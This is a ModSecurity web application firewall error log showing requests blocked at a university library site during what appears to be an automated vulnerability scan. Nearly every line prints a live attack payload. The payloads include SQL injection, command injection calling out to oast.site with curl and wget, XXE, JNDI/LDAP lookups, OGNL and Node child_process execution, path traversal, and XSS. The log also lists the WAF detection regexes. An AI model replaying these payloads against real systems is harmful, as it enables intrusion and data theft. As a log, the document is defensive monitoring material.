[Tue Aug 29 11:31:37.458823 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:discount_code. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:discount_code: '  union select sleep(6) -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO10qcCo-f0AAAQJWvYAAAAr"]
[Tue Aug 29 11:31:38.323445 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ztd_password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:ztd_password: $(/bin/wget$IFShttp:/cjmn8l5jmimk2adbbnlgtupr67tdkn8nj.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/Collector/nms/addModifyZTDProxy"] [unique_id "ZO10qsCo-f0AAAP@M1QAAAAZ"]
[Tue Aug 29 11:31:38.561184 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:day. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:day: 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/module/smartblog/archive"] [unique_id "ZO10qsCo-f0AAAQkBW0AAAAC"]
[Tue Aug 29 11:31:38.612277 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:username: ;`curl cjmn8l5jmimk2adbbnlgzrmn1rrxw8ez4.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/login"] [unique_id "ZO10qsCo-f0AAAPiBj4AAAAB"]
[Tue Aug 29 11:31:39.375667 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:payload. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22 ?><! found within ARGS:payload: <?xml version=\\x221.0\\x22 ?><!DOCTYPE a [ <!ENTITY % xxe SYSTEM \\x22http://cjmn8l5jmimk2adbbnlgoxiwtxw9pxo8a.oast.site\\x22>%xxe;]>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/carbon/generic/save_artifact_ajaxprocessor.jsp"] [unique_id "ZO10q8Co-f0AAAQkBW8AAAAC"]
[Tue Aug 29 11:31:40.399648 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "perpustakaan.unla.ac.id"] [uri "/Config/SaveUploadedHotspotLogoFile"] [unique_id "ZO10rMCo-f0AAAP@M18AAAAZ"]
[Tue Aug 29 11:31:41.611577 2023] [:error] [pid 1029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at REQUEST_COOKIES:wpsc_guest_login_auth. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within REQUEST_COOKIES:wpsc_guest_login_auth: {\\x22email\\x22:\\x22' AND (SELECT 42 FROM (SELECT(SLEEP(6)))NNTu)-- cLmu\\x22}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO10rcCo-f0AAAQFcTwAAAAn"]
[Tue Aug 29 11:31:43.356272 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:folder. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:folder: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10r8Co-f0AAAQnF30AAAAF"]
[Tue Aug 29 11:31:44.360517 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:progressfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:progressfile: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/usc-e-shop/functions/progress-check.php"] [unique_id "ZO10sMCo-f0AAANsAUsAAAAD"]
[Tue Aug 29 11:31:44.360648 2023] [:error] [pid 1020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:meta_ids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:meta_ids: 1 AND (SELECT 3066 FROM (SELECT(SLEEP(6)))CEHy)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10sMCo-f0AAAP8G08AAAAV"]
[Tue Aug 29 11:31:44.364561 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "perpustakaan.unla.ac.id"] [uri "/soap.cgi"] [unique_id "ZO10sMCo-f0AAAN@5IkAAAAO"]
[Tue Aug 29 11:31:44.364594 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "perpustakaan.unla.ac.id"] [uri "/soap.cgi"] [unique_id "ZO10sMCo-f0AAAN@5IkAAAAO"]
[Tue Aug 29 11:31:44.383180 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:handle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  = ( found within ARGS:handle: com.tangosol.coherence.mvel2.sh.ShellSession(\\x22weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread();\\x0d\\x0aweblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();\\x0d\\x0ajava.lang.reflect.Field field = adapter.getClass().getDeclaredField(\\x22connectionHandler\\x22);\\x0d\\x0afield.setAccessible(true);\\x0d\\x0aObject obj = field.get(adapter);\\x0d\\x0aweblogic.servlet.internal.ServletRequestImpl req = (weblog..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/console/css/%2e%2e%2fconsole.portal"] [unique_id "ZO10sMCo-f0AAAQOv3gAAAAw"]
[Tue Aug 29 11:31:45.424254 2023] [:error] [pid 854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id: (SELECT 1337 FROM (SELECT(SLEEP(6)))MrMV)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10scCo-f0AAANWgU4AAAAG"]
[Tue Aug 29 11:31:45.473057 2023] [:error] [pid 1018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:argumentCollection. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '/></ found within ARGS:argumentCollection: <wddxPacket version='1.0'><header/><data><struct type='xcom.sun.rowset.JdbcRowSetImplx'><var name='dataSourceName'><string>ldap://cjmn8l5jmimk2adbbnlgn6wzh5waobuo6.oast.site/rcrzfd</string></var><var name='autoCommit'><boolean value='true'/></var></struct></data></wddxPacket>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/CFIDE/adminapi/accessmanager.cfc"] [unique_id "ZO10scCo-f0AAAP6NPYAAAAQ"]
[Tue Aug 29 11:31:46.393454 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/pages/createpage-entervariables.action"] [unique_id "ZO10ssCo-f0AAAP5mKkAAAAM"]
[Tue Aug 29 11:31:47.404851 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/pages/createpage-entervariables.action"] [unique_id "ZO10s8Co-f0AAAQNwIYAAAAv"]
[Tue Aug 29 11:31:47.406110 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:KEY_LENGTH. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x22..\\x5c found within ARGS:KEY_LENGTH: 1024 -providerclass Si -providerpath \\x22..\\x5cbin\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/RestAPI/Connection"] [unique_id "ZO10s8Co-f0AAAPDn8sAAAAP"]
[Tue Aug 29 11:31:48.475781 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/confluence/pages/createpage-entervariables.action"] [unique_id "ZO10tMCo-f0AAAQNwIkAAAAv"]
[Tue Aug 29 11:31:49.374752 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/confluence/pages/createpage-entervariables.action"] [unique_id "ZO10tcCo-f0AAAQJWxYAAAAr"]
[Tue Aug 29 11:31:50.320538 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sgcgoogleanalytic. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22)</ found within ARGS:sgcgoogleanalytic: <script>console.log(\\x22document.domain\\x22)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/options-general.php"] [unique_id "ZO10tsCo-f0AAANsAVgAAAAD"]
[Tue Aug 29 11:31:50.471353 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wiki/pages/createpage-entervariables.action"] [unique_id "ZO10tsCo-f0AAAP@M3YAAAAZ"]
[Tue Aug 29 11:31:51.331052 2023] [:error] [pid 1018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wiki/pages/createpage-entervariables.action"] [unique_id "ZO10t8Co-f0AAAP6NQgAAAAQ"]
[Tue Aug 29 11:31:51.348965 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:document. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:             (() => {\\x0a         found within ARGS:document:             (() => {\\x0a        const process = clearImmediate.constructor(\\x22return process;\\x22)();\\x0a        const result = process.mainModule.require(\\x22child_process\\x22).execSync(\\x22id > build/css/2Udxkf4l8YMdxIMziw7l7YPgbXU.css\\x22);\\x0a        console.log(\\x22Result: \\x22   result);\\x0a        return true;\\x0a    })()        "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/checkValid"] [unique_id "ZO10t8Co-f0AAAQnF5EAAAAF"]
[Tue Aug 29 11:31:51.399668 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Rule 7fe1c606a5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "perpustakaan.unla.ac.id"] [uri "/\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\b\\xb7\\x06\\b;{curl,http:/cjmn8l5jmimk2adbbnlgr6eowbydokeq7.oast.site+-H+'User-Agent:+LGgfDE'};\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\b\\xb7\\x06\\b;{curl,http:/cjmn8l5jmimk2adbbnlgd6tab1ezmgpe7.oast.site+-H+'User-Agent:+LGgfDE'};"] [unique_id "ZO10t8Co-f0AAANsAV0AAAAD"]
[Tue Aug 29 11:31:51.424430 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: No boundaries found in payload."] [severity "CRITICAL"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10t8Co-f0AAANsAV4AAAAD"]
[Tue Aug 29 11:31:52.452390 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Rule 7fe1c606a5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "perpustakaan.unla.ac.id"] [uri "/\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbfd\\xb8\\x06\\b;{curl,http:/cjmn8l5jmimk2adbbnlgimxapz4ywripb.oast.site+-H+'User-Agent:+LGgfDE'};\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbfd\\xb8\\x06\\b;{curl,http:/cjmn8l5jmimk2adbbnlgucaymqbrrktgr.oast.site+-H+'User-Agent:+LGgfDE'};"] [unique_id "ZO10uMCo-f0AAAQNwJsAAAAv"]
[Tue Aug 29 11:31:52.524893 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/pages/doenterpagevariables.action"] [unique_id "ZO10uMCo-f0AAAP5mLkAAAAM"]
[Tue Aug 29 11:31:53.413408 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:id: ' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO10ucCo-f0AAAQNwKAAAAAv"]
[Tue Aug 29 11:31:53.433542 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/pages/createpage.action"] [unique_id "ZO10ucCo-f0AAAQNwKEAAAAv"]
[Tue Aug 29 11:31:54.338659 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/pages/templates2/viewpagetemplate.action"] [unique_id "ZO10usCo-f0AAAN@5LUAAAAO"]
